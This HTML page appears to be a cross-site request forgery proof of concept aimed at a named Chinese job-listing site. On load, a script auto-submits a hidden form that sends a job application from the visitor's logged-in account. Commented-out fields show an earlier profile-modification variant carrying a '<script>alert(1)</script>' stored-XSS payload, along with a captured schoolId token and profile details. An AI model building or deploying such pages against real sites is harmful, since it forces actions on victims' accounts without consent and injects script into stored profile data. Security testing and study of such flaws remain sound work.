<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>csrfb</title>
</head>
<body>
<form id="modify" action="http://guangzhou.jianzhimao.com/ctrlperson/sendApplication" method="GET">
    <div>jid:<input type="text" name="jid" value="SHE3VHhyUGRiV009"></div>
    <!--<div>province:<input type="text" name="province" value="广东"></div>-->
    <!--<div>realName:<input type="text" name="realName" value="猪"></div>-->
    <!--<div>cncity:<input type="text" name="cncity" value="广州"></div>-->
    <!--<div>area:<input type="text" name="area" value="天河"></div>-->
    <!--<div>year:<input type="text" name="year" value="1111"></div>-->
    <!--<div>month:<input type="text" name="month" value="1"></div>-->
    <!--<div>day:<input type="text" name="day" value="1"></div>-->
    <!--<div>sex:<input type="text" name="sex" value="男"></div>-->
    <!--<div>birthday:<input type="text" name="birthday" value="1111-1-1"></div>-->
    <!--<div>introduction:<input type="text" name="introduction" value="<script>alert(1)</script>"></div>-->
    <div><input type="submit" value="修改"></div>


    <!--schoolId:xr963y7Y1ruRi80G-jMHBk0QoIaUwQfRRO78a57yE-UIRBvNxpdyY3wiVZ9-evuPhdPWNpxU7YxSsGgb36QCCw-->
    <!--intentionIds:-->
    <!--realName:阿里-->
    <!--nickName:LcgC0366-->
    <!--sex:1-->
    <!--height:160-->
    <!--birthday:1995-08-30-->
    <!--signature:-->
    <!--illustrate:<script>alert(1)</script>-->
</form>
<script>
    document.getElementById("modify").submit();
</script>

</body>
</html>